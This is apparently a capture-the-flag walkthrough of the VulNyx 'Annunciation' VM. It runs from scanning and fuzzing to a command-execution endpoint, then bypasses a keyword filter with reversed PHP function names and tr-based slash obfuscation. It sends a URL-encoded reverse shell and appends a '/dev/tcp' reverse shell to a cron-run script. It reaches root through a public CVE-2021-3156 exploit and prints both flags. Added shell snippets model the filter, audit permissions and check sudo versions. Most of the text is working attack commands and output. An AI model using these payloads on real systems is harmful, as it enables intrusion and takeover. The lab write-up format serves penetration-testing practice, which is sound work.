Annunciation

Posted by axlfpe on 2025-05-21


Target IP: 192.168.108.136

Attacker IP: 192.168.108.50

Target VM source: https://vulnyx.com/

Kal ddddx ~ ❯ export ip=192.168.108.136
Kal ddddx ~ ❯ nmap $ip -A -O -p- ✘ INT at 07:59:58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 08:00 CST
Nmap scan report for 192.168.108.136
Host is up (0.0010s latency).
Not shown: 65387 filtered tcp ports (no-response), 146 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 3b:a9:30:f4:e2:10:b4:3b:2e:a4:db:32:9a:b9:8b:80 (RSA)
| 256 76:f3:48:b4:53:4a:be:95:44:00:16:81:1e:f2:2e:68 (ECDSA)
|_ 256 37:07:9a:8d:e0:3b:bc:39:8f:2f:6e:36:81:89:db:2d (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:1C:F8:AF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 5.1 - 5.15 (97%), Linux 3.13 - 3.16 (91%), Linux 3.13 - 4.4 (91%), Linux 3.16 - 4.6 (91%), Linux 3.8 - 3.16 (91%), Linux 4.10 (91%), Linux 4.4 (91%), OpenWrt 19.07 (Linux 4.14) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.108.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.17 seconds

Two ports are open, 22 and 80. nmap reports that the HTTP server accepts the TRACE method, so a Cross Site Tracing (XST) issue may exist, where JavaScript combined with XSS can be used to bypass the same-origin policy and read response content.

Opening port 80 in a browser shows the default Apache page, so there is probably nothing there.


Next, directory brute-forcing: the normal scan found nothing, but scanning for dot-prefixed (hidden) directories turned up .dev

Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u 'http://192.168.108.136/FUZZ' -fc 403

...

Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u 'http://192.168.108.136/.FUZZ' -fc 403

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.108.136/.FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________

dev [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 0ms]

Visiting .dev and viewing the source of .dev gives nothing useful.

With no leads, continue brute-forcing to see whether .dev/ is a directory with content. The first pass returned a lot of junk; after filtering on response size, a long scan finally produced one page.


Kal ddddx ~ ❯ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u 'http://192.168.108.136/.dev/FUZZ' -e .txt,.php,.html -fc 403 --fs 19485
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev

:: Method : GET
:: URL : http://192.168.108.136/.dev/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
:: Extensions : .txt .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
:: Filter : Response size: 19485

debugger.php [Status: 200, Size: 33, Words: 5, Lines: 2, Duration: 257ms]
:: Progress: [147168/4741016] :: Job [1/1] :: 917 req/sec :: Duration: [0:02:38] :: Errors: 0 ::

Requesting debugger.php says that only the POST method is supported.


With POST, it tells us we have not supplied the appropriate parameters. Enumerating parameter names with wfuzz found nothing; from PL4GU3's walkthrough video it turns out two parameters are required, and brute-forcing both at once is very slow.

Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "test=data"                          at 08:57:48
You have not indicated the appropriate parameters...
Please try again!
wfuzz -u http://192.168.108.136/.dev/debugger.php -X POST -d "FUZZ=whoami" -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -H "Content-Type: application/x-www-form-urlencoded" --hh 0 --hc 200
Kal ddddx ~ ❯ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:W1 -w /usr/share/seclists/Discovery/Web-Content/common.txt:W2 -u http://192.168.108.136/.dev/debugger.php -X POST -d "W1=whoami&W2=test" -H "Content-Type: application/x-www-form-urlencoded" -mc 500 -t 3000

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : POST
:: URL : http://192.168.108.136/.dev/debugger.php
:: Wordlist : W1: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Wordlist : W2: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : W1=whoami&W2=test
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 3000
:: Matcher : Response status: 500
________________________________________________

[Status: 500, Size: 53, Words: 7, Lines: 3, Duration: 144ms]
* W1: cmd
* W2: access

Try submitting commands:

Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "cmd=whoami&access=id"               at 14:24:17
Parameter 1 (access): di
Parameter 2 (cmd): whoami
Kal ddddx ~ ❯ curl -X POST http://192.168.108.136/.dev/debugger.php -d "cmd=id&access=whoami" at 14:24:36
Parameter 1 (access): imaohw
Parameter 2 (cmd): id

access=whoami is echoed back as imaohw: **the value is reversed**, and cmd=id is not executed. Replacing the access value with a reversed PHP function name and resending gives a 200 status, which means the call executed. From this we can infer that the server code probably contains logic roughly like this:

<?php
if (isset($_POST['cmd']) && isset($_POST['access'])) {
    $reversed_access = strrev($_POST['access']); // reverse the access parameter
    $reversed_access($_POST['cmd']);             // call the reversed value as a function name, with cmd as its argument
}


So we try passing in PHP functions that can execute the cmd value, for example:

  • exec(): runs a command without printing its output directly; the result can be captured
  • passthru(): runs a command and writes its raw output straight to the page (good for viewing command-line output)
  • shell_exec(): runs a command and returns the complete output as a string
  • system(): runs a command and prints each line as it is produced; also returns the last line
  • backticks: PHP syntactic sugar that behaves like shell_exec()

In the end passthru is the one that works.

(Note that the value must not contain a newline; it would be included in the function name and break the call.)

First list the current directory, then try to read the source of debugger.php: no output. Reading passwd also gives no output, so some filtering is suspected.


Base64-encoding the command does not get through. Instead, use cat with $(...) obfuscation to reach the target **/etc/passwd**.

The suspicion is that / is filtered. The usual trick is:

cat $(echo .etc.passwd | tr '.' '/')

echo .etc.passwd ➜ outputs .etc.passwd

tr '.' '/' ➜ rewrites it to /etc/passwd

cat $(...) ➜ actually runs: cat /etc/passwd

Since a literal / would be stripped, tr is used with range mapping instead: pick two character ranges of equal length so that . lines up with / (',-0' expands to , - . / 0 and '--1' to - . / 0 1, so the third character . maps to the third character /).

access=urhtssap&cmd=cat $(echo .etc.passwd | tr ',-0' '--1')


Parameter 1 (access): passthru
Parameter 2 (cmd): cat $(echo .etc.passwd | tr ',-0' '--1')
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
trumpeter:x:1001:1001::/home/trumpeter:/bin/bash

Retrying with the same trick, the source of debugger.php is retrieved successfully:

access=urhtssap&cmd=cat $(echo .var.www.html. | tr ',-0' '--1').dev$(echo . | tr ',-0' '--1')debugger.php
Parameter 1 (access): passthru
Parameter 2 (cmd): cat $(echo .var.www.html. | tr ',-0' '--1').dev$(echo . | tr ',-0' '--1')debugger.php
<?php

$var1 = strrev($_POST['access']); // reverse the access parameter and use it as a function name
$var2 = str_replace(array('nc', 'whoami', 'curl', 'ping', 'pwd', 'hostname', 'sh', 'nc', 'base', ':', '\\', '/', '*'), '', $_POST['cmd']);
// strip "dangerous" commands and characters
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    if(isset($_POST['access']) && isset($_POST['cmd']))
    {
        echo "Parameter 1 (access): " . strrev($_POST['access']) . "\n";
        echo "Parameter 2 (cmd): " . $_POST['cmd'] . "\n";
        $var1($var2); // equivalent to passthru($var2) when access=urhtssap
        extract($_POST);
    }
    else {
        echo "You have not indicated the appropriate parameters...\nPlease try again!\n";
    }
}
else {
    echo "Only POST requests are accepted!\n";
}

?>

Filter logic: any occurrence of these keywords in the submitted command is simply deleted:

  • Commands: nc, whoami, curl, ping, pwd, hostname, sh, base
  • Symbols: :, \, /, *

sh is on the list, so pass in an obfuscated, URL-encoded reverse shell:

access=urhtssap&cmd=s\h+-i+>%26+$(echo+.dev.tcp.+|+tr+',-0'+'--1')192.168.108.50$(echo+.+|+tr+',-0'+'--1')4444+0>%261
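The filter above strips substrings in a fixed order instead of rejecting the request, which is why s\h survives as sh and why the tr range trick gets a / past it. The following is an added example, not code from the writeup or from the target: a sed model of the blacklist (same patterns, same order) plus a detection rule a defender could run over logged POST bodies; the request bodies are constructed from values on this page and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the writeup): model debugger.php's str_replace()
# blacklist with sed, whose -e expressions run one after another exactly
# like str_replace() does with an array, and pair it with a detection rule.

# Apply the page's blacklist to one cmd value and print the result.
# 'sh' is removed before the backslash, so an input of s\h comes out as sh.
# Stripping instead of rejecting is what makes the filter bypassable.
php_filter() {
    printf '%s\n' "$1" | sed \
        -e 's/nc//g' -e 's/whoami//g' -e 's/curl//g' -e 's/ping//g' \
        -e 's/pwd//g' -e 's/hostname//g' -e 's/sh//g' -e 's/nc//g' \
        -e 's/base//g' -e 's/://g' -e 's/\\//g' -e 's|/||g' -e 's/\*//g'
}

# Detection rule: return 0 (suspicious) when a cmd value contains shell
# constructs a debugging endpoint never needs: command substitution,
# backticks, a backslash inside a word, or tr range remapping.
suspicious_cmd() {
    case "$1" in
        *'$('*|*'`'*|*'\'*|*' tr '*) return 0 ;;
    esac
    return 1
}

# Print one verdict per constructed request body (values taken from the page).
audit_bodies() {
    for body in 's\h -i' 'cat $(echo .etc.passwd | tr ",-0" "--1")' 'ls -la'; do
        if suspicious_cmd "$body"; then verdict=ALERT; else verdict=ok; fi
        printf '%-5s after filter: %s\n' "$verdict" "$(php_filter "$body")"
    done
}
audit_bodies
```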


After looking around without result, upload some tooling to help with enumeration:

(remote) apache@annunciation:/tmp$ ls
linpeas.sh pspy64 socat
(remote) apache@annunciation:/tmp$ chmod +x pspy64
(remote) apache@annunciation:/tmp$ chmod +x linpeas.sh
(remote) apache@annunciation:/tmp$ chmod +x socat
(remote) apache@annunciation:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
.......
2025/05/30 10:35:33 CMD: UID=0 PID=2 |
2025/05/30 10:35:33 CMD: UID=0 PID=1 | /usr/lib/systemd/systemd --switched-root --system --deserialize 22
2025/05/30 10:36:01 CMD: UID=0 PID=2056 | /usr/sbin/crond -n
2025/05/30 10:36:01 CMD: UID=1001 PID=2058 | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=1001 PID=2057 | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=0 PID=2060 | /usr/sbin/CROND -n
2025/05/30 10:36:01 CMD: UID=1001 PID=2059 | /usr/bin/python3 /usr/local/bin/binwalk -M -e /opt/RE/walk.zip
2025/05/30 10:36:01 CMD: UID=1001 PID=2061 | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:01 CMD: UID=1001 PID=2062 | /bin/bash /opt/RE/autobin.sh
2025/05/30 10:36:03 CMD: UID=1001 PID=2063 | /usr/sbin/postdrop -r
2025/05/30 10:36:05 CMD: UID=0 PID=2064 |

The UID shows a non-root user (1001) repeatedly running the same script, which uses binwalk to recursively (-M) extract the nested files in /opt/RE/walk.zip. Copy autobin.sh out, append a reverse-shell command to it, put it back, start a listener, and we get a shell as trumpeter and the first flag.

(remote) apache@annunciation:/tmp$ ls -al /opt/RE/autobin.sh
-r-xr-xr-x 1 trumpeter apache 142 Aug 28 2023 /opt/RE/autobin.sh
(remote) apache@annunciation:/tmp$ cp /opt/RE/autobin.sh /tm
(remote) apache@annunciation:/tmp$ vi autobin.sh
(remote) apache@annunciation:/tmp$ cat autobin.sh
#!/bin/bash

/usr/local/bin/binwalk -M -e /opt/RE/walk.zip
rm -rf /home/trumpeter/_walk.zip*
rm -rf /home/trumpeter/.config/binwalk/plugins/*
bash -i >& /dev/tcp/192.168.108.50/3333 0>&1
(remote) apache@annunciation:/tmp$ chmod 777 autobin.sh
(remote) apache@annunciation:/tmp$ ls -al autobin.sh
-rwxrwxrwx 1 apache apache 142 May 30 10:46 autobin.sh
(remote) apache@annunciation:/tmp$ vi autobin.sh
(remote) apache@annunciation:/tmp$ mv autobin.sh /opt/RE/autobin.sh
mv: try to overwrite '/opt/RE/autobin.sh', overriding mode 0555 (r-xr-xr-x)? y
(remote) apache@annunciation:/tmp$
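The escalation works because the script cron runs as trumpeter sits in a directory the apache user can write to, so the 0555 mode on the script itself is no protection: mv only needs write access to the directory. As an added example (not from the writeup), here is a POSIX shell check that audits both the script and its parent directory for unexpected ownership and group/other write bits, run against a constructed temp-directory copy of the layout; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a script that cron runs as
# another user. It inspects the script AND its parent directory, because a
# replacement can be moved over a read-only file whenever the directory is
# writable. The demo tree is constructed under mktemp; no system paths.

# Usage: cron_script_exposed SCRIPT EXPECTED_OWNER
# Returns 0 (exposed) and prints why, or returns 1 (ok).
cron_script_exposed() {
    script=$1; want=$2
    for p in "$script" "$(dirname "$script")"; do
        # ls -ld prints e.g. "drwxrwxr-x 2 user group ..."; take mode and owner.
        line=$(ls -ld "$p" 2>/dev/null) || { echo "error: cannot stat $p"; return 2; }
        perms=$(printf '%s\n' "$line" | cut -c1-10)
        owner=$(printf '%s\n' "$line" | awk '{print $3}')
        gw=$(printf '%s\n' "$perms" | cut -c6)   # group write bit
        ow=$(printf '%s\n' "$perms" | cut -c9)   # other write bit
        if [ "$owner" != "$want" ] && [ "$owner" != root ]; then
            echo "exposed: $p is owned by $owner, expected $want"; return 0
        fi
        if [ "$gw" = w ] || [ "$ow" = w ]; then
            echo "exposed: $p is $perms (writable by group/others)"; return 0
        fi
    done
    echo "ok: $script and its directory are not writable by others"
    return 1
}

# Build a constructed copy of the page's layout: a 0555 script inside a
# group-writable directory. Prints the script path.
make_demo_tree() {
    base=$(mktemp -d)
    mkdir "$base/RE"
    printf '#!/bin/bash\necho walk\n' > "$base/RE/autobin.sh"
    chmod 555 "$base/RE/autobin.sh"
    chmod 775 "$base/RE"
    printf '%s\n' "$base/RE/autobin.sh"
}

demo=$(make_demo_tree)
cron_script_exposed "$demo" "$(id -un)" || true   # exposed: directory is g+w
chmod 755 "$(dirname "$demo")"
cron_script_exposed "$demo" "$(id -un)" || true   # ok after fixing the directory
```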
(remote) trumpeter@annunciation:/home/trumpeter$ id
uid=1001(trumpeter) gid=1001(trumpeter) groups=1001(trumpeter)
(remote) trumpeter@annunciation:/home/trumpeter$ cat user.txt
VulNyx{4fd65522b14a83bd3c49f8cebdea42f6}

List the commands this user may run with sudo on the system:

(remote) trumpeter@annunciation:/home/trumpeter$ sudo -l
Matching Defaults entries for trumpeter on annunciation:
!visiblepw, always_set_home, match_group_by_gid,
always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2
QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LD_LIBRARY_PATH LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
_XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User trumpeter may run the following commands on annunciation:
(root) NOPASSWD: /usr/sbin/findfs

/usr/sbin/findfs can be run via sudo without a password (NOPASSWD). findfs may invoke lower-level tools such as blkid or attempt a mount, which could in principle be combined with a malicious filesystem image, but nothing is mounted automatically and we lack permission to mount manually, so this is a dead end.

Checking the sudo version shows it is old enough to be affected by CVE-2021-3156:

(remote) trumpeter@annunciation:/tmp$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
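To make the version check above repeatable across hosts, here is an added example (not from the writeup) that parses `sudo --version` output and tests the version against the CVE-2021-3156 affected ranges (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1). The sample output is constructed from the page's 1.8.23 and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the writeup): fleet-audit style check for
# CVE-2021-3156 based on the sudo version string.

# Extract "1.8.23" or "1.9.5p2" from the first line of `sudo --version`.
sudo_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.]*p\{0,1\}[0-9]*\).*/\1/p' | head -n 1
}

# Returns 0 when VERSION is in an affected range, 1 otherwise.
sudo_cve_2021_3156_affected() {
    base=${1%%p*}                                   # 1.8.31p2 -> 1.8.31
    plevel=${1#"$base"}; plevel=${plevel#p}; plevel=${plevel:-0}   # -> 2 (or 0)
    old_ifs=$IFS; IFS=.; set -- $base; IFS=$old_ifs  # split on dots
    maj=$1; min=$2; pat=${3:-0}
    [ "$maj" = 1 ] || return 1
    case $min in
        8) [ "$pat" -ge 2 ] && { [ "$pat" -lt 31 ] || { [ "$pat" -eq 31 ] && [ "$plevel" -le 2 ]; }; } ;;
        9) [ "$pat" -lt 5 ] || { [ "$pat" -eq 5 ] && [ "$plevel" -le 1 ]; } ;;
        *) return 1 ;;
    esac
}

# Constructed sample, copied from the page's `sudo --version` output.
SAMPLE_OUTPUT='Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23'

# Print a verdict for one host's output; returns 0 when patching is required.
audit_sudo_output() {
    v=$(sudo_version_from_output "$1")
    if sudo_cve_2021_3156_affected "$v"; then
        echo "sudo $v: affected by CVE-2021-3156, upgrade to 1.8.32 / 1.9.5p2 or later"
        return 0
    fi
    echo "sudo $v: not in the affected range"
    return 1
}
audit_sudo_output "$SAMPLE_OUTPUT" || true
```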

Grab an exploit from GitHub (https://github.com/worawit/CVE-2021-3156); running it yields a privileged user:

(remote) trumpeter@annunciation:/tmp$ vi run.py
You have new mail in /var/mail/trumpeter
(remote) trumpeter@annunciation:/tmp$ python run.py
.....
(remote) trumpeter@annunciation:/tmp$ cat /etc/passwd
...
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
(remote) trumpeter@annunciation:/tmp$ su gg
Password:
(remote) root@annunciation:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@annunciation:/home# cd /root/
(remote) root@annunciation:/root# ls
root.txt
(remote) root@annunciation:/root# cat root.txt
VulNyx{3c84b473492b03c0eaeaa749d4d53d52}
